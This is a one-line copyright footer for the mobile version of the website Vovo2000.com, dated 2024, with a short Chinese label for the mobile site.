© Vovo2000.com Mobile Version 小哈手機版 2024